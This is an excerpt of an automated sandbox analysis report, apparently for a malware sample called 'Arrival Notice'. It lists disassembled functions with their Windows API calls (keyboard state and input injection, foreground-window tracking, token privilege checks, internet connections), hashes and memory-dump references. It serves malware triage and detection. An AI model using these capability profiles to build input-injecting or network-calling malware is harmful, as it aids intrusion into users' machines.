                                              • Opcode ID: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
                                              • Instruction ID: bc16fce6d17c96a3f332ccad33bd29bac8678c5d4b0d8bbac73436990bbcd30b
                                              • Opcode Fuzzy Hash: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
                                              • Instruction Fuzzy Hash: 8531E674605208BFEF20DF5ACC55FAB37ADEB05362F244A12FE51F62A0DE34A9489741
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 0095AE1A
                                              • GetWindowRect.USER32(?,?), ref: 0095AE90
                                              • PtInRect.USER32(?,?,0095C304), ref: 0095AEA0
                                              • MessageBeep.USER32(00000000), ref: 0095AF11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
                                              • Instruction ID: f402670e29ca290a51618ec01509616127bab3fe3d341b7eded0b1ee794f73a8
                                              • Opcode Fuzzy Hash: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
                                              • Instruction Fuzzy Hash: D041CF70604209DFCB11CF5AD885B697BF5FF89352F1482A9EC05DB250D730A849DF56
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00931037
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00931053
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009310B9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0093110B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
                                              • Instruction ID: c22ea8a976997c111b712f90e8da32f1a474aab7dc8f937d9d1648b0a12d7b1b
                                              • Opcode Fuzzy Hash: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
                                              • Instruction Fuzzy Hash: 6A314B30E44688AEFF388B668C057F9BBADAB88320F04421AF581561F1C37489D19F52
                                              APIs
                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00931176
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00931192
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 009311F1
                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00931243
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
                                              • Instruction ID: fe605353d409402c2fa03745df5489bde6e23dfdc2a16cf1e6a96ee9705d0ebe
                                              • Opcode Fuzzy Hash: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
                                              • Instruction Fuzzy Hash: 83313A3094870C5EFF348AA68C187FA7BAEAB89320F04475AF591921F1D37849559F61
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0090644B
                                              • __isleadbyte_l.LIBCMT ref: 00906479
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064A7
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
                                              • Instruction ID: 155c4ad5c2281d3e9629e39ba3db26ff3d60acc90a2f8efaa15caf9489eff4ef
                                              • Opcode Fuzzy Hash: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
                                              • Instruction Fuzzy Hash: 4D31AF3160425AEFDB218F79CC85BBA7BA9FF41320F154429F854971E1EB31D860DB90
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00955189
                                                • Part of subcall function 0093387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00933897
                                                • Part of subcall function 0093387D: GetCurrentThreadId.KERNEL32 ref: 0093389E
                                                • Part of subcall function 0093387D: AttachThreadInput.USER32(00000000,?,009352A7), ref: 009338A5
                                              • GetCaretPos.USER32(?), ref: 0095519A
                                              • ClientToScreen.USER32(00000000,?), ref: 009551D5
                                              • GetForegroundWindow.USER32 ref: 009551DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
                                              • Instruction ID: da6be9bc43f8d199a3cd1c6de19f1b98549b053c253dca4be15fdf2c69899ed5
                                              • Opcode Fuzzy Hash: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
                                              • Instruction Fuzzy Hash: ED312F72900118AFDB00EFA9C885EEFB7FDEF98304F10406AE455E7241EA759E05CBA1
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • GetCursorPos.USER32(?), ref: 0095C7C2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0090BBFB,?,?,?,?,?), ref: 0095C7D7
                                              • GetCursorPos.USER32(?), ref: 0095C824
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0090BBFB,?,?,?), ref: 0095C85E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
                                              • Instruction ID: ed6f4afef8106c4dfb34c500f5097474373163956ef954ff72fe5ffc4c2a86e4
                                              • Opcode Fuzzy Hash: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
                                              • Instruction Fuzzy Hash: 7231A075600218BFCB15CF5AC898EFA7BBAEB49321F044169FE058B261C7319D55EFA0
                                              APIs
                                                • Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
                                                • Part of subcall function 00928652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
                                                • Part of subcall function 00928652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
                                                • Part of subcall function 00928652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
                                                • Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00928BEB
                                              • _memcmp.LIBCMT ref: 00928C0E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00928C44
                                              • HeapFree.KERNEL32(00000000), ref: 00928C4B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
                                              • Instruction ID: 190de50f9766d74c27574e4a6f3d1da81e1a024d12757b528eb73ce6b93559d4
                                              • Opcode Fuzzy Hash: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
                                              • Instruction Fuzzy Hash: EC21AC71E02219EFDB00DFA4D949BEFB7B8EF40355F144099E494A7240DB30AE06DB60
                                              APIs
                                              • __setmode.LIBCMT ref: 008F0BF2
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                              • _fprintf.LIBCMT ref: 008F0C29
                                              • OutputDebugStringW.KERNEL32(?), ref: 00926331
                                                • Part of subcall function 008F4CDA: _flsall.LIBCMT ref: 008F4CF3
                                              • __setmode.LIBCMT ref: 008F0C5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: c3f848c2cc4f240b1eb3128c476cda48c4b9ec87e57e6da908aa7c444fa37805
                                              • Instruction ID: 69c24eb68a251795358ac08e35916be241a60a22fdd5168f46cefe16103429b1
                                              • Opcode Fuzzy Hash: c3f848c2cc4f240b1eb3128c476cda48c4b9ec87e57e6da908aa7c444fa37805
                                              • Instruction Fuzzy Hash: 9B11E432A0421C7EDB04B7B8AC46ABF7B69FF81320F14021BF314D7292DE615D969796
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00941A97
                                                • Part of subcall function 00941B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
                                                • Part of subcall function 00941B21: InternetCloseHandle.WININET(00000000), ref: 00941BDD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
                                              • Instruction ID: b4f4f0f2432e8ceaa88e7eb874e14f8a79adc77d0fab8d42afe86ceac652bc14
                                              • Opcode Fuzzy Hash: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
                                              • Instruction Fuzzy Hash: F721C035204701BFEB169F61CC01FBBBBADFF88711F10041AFA5596661EB71E851ABA0
                                              APIs
                                                • Part of subcall function 0092F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F5BC
                                                • Part of subcall function 0092F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0092F5E2
                                                • Part of subcall function 0092F5AD: lstrcmpiW.KERNEL32(00000000,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F613
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E1DD
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0092E203
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E237
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 8763670225b38cef816ee53ce0952629742e85910618dcc8320ab7bb7eebff10
                                              • Instruction ID: ebcf3625d89c4506b92f1674e448805c6bb9adfe5d58f5494a2a8a9fc5fe59f6
                                              • Opcode Fuzzy Hash: 8763670225b38cef816ee53ce0952629742e85910618dcc8320ab7bb7eebff10
                                              • Instruction Fuzzy Hash: 4211BE36204315EFCB25AF74E885E7A77BCFF84350B40402AF816CB2A8EB719850D7A0
                                              APIs
                                              • _free.LIBCMT ref: 00905351
                                                • Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                • Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
                                                • Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
                                              • Instruction ID: 7143e846d785f827ee5087700180d90fe0ed179ec404125032aa140ce7e22f2d
                                              • Opcode Fuzzy Hash: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
                                              • Instruction Fuzzy Hash: 9611BC32508A19EECB213B78AC0566E3B98EF143E0B21482AFA04DB1D0DAB589409B91
                                              APIs
                                              • _memset.LIBCMT ref: 008D4560
                                                • Part of subcall function 008D410D: _memset.LIBCMT ref: 008D418D
                                                • Part of subcall function 008D410D: _wcscpy.LIBCMT ref: 008D41E1
                                                • Part of subcall function 008D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1
                                              • KillTimer.USER32(?,00000001,?,?), ref: 008D45B5
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D45C4
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0090D6CE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
                                              • Instruction ID: a2d86a8ec1b8739e3e84a2cd44cb6f2eb47cd709ea9a3ccfb7349d5a3cde6602
                                              • Opcode Fuzzy Hash: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
                                              • Instruction Fuzzy Hash: DE212670909784AFEB328B64DC55BEBBBECEF01318F00009EE29E96281C7755A84DB51
                                              APIs
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                              • gethostbyname.WSOCK32(?,?,?), ref: 009466AC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 009466B7
                                              • _memmove.LIBCMT ref: 009466E4
                                              • inet_ntoa.WSOCK32(?), ref: 009466EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: 9216577ce57842baa244939c9eea3d55a73b11a7cffe5842613e6351097f3de5
                                              • Instruction ID: fd78022b14feaab3e49f25633349861fceb0bc92cabad645fbdf6b93d8521e5d
                                              • Opcode Fuzzy Hash: 9216577ce57842baa244939c9eea3d55a73b11a7cffe5842613e6351097f3de5
                                              • Instruction Fuzzy Hash: C5114C75500609ABCB00EBA8D996DEEB7B8FF44321B144166F502E7261DF30AE04DB62
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00929043
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929055
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092906B
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929086
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
                                              • Instruction ID: a695fa15c3964655df57dec3570881cfdc6276c726d0f0a77854c6dad6234b17
                                              • Opcode Fuzzy Hash: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
                                              • Instruction Fuzzy Hash: 8A115E79941218FFEB10DFA5CC84F9DBBB8FB48710F2040A5EA04B7254D6716E10DB90
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8
                                              • GetClientRect.USER32(?,?), ref: 0090B84B
                                              • GetCursorPos.USER32(?), ref: 0090B855
                                              • ScreenToClient.USER32(?,?), ref: 0090B860
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
                                              • Instruction ID: 03d24d2a1ccc9487e5ff16f126f3de375634f2ccc9c22ae906c3bd9ebc9b51ff
                                              • Opcode Fuzzy Hash: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
                                              • Instruction Fuzzy Hash: C0115535A10119BFCF00EFA9D8899BE77B9FF05311F000556F901E3250D731AA519BA6
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093166F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 00931694
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093169E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 009316D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
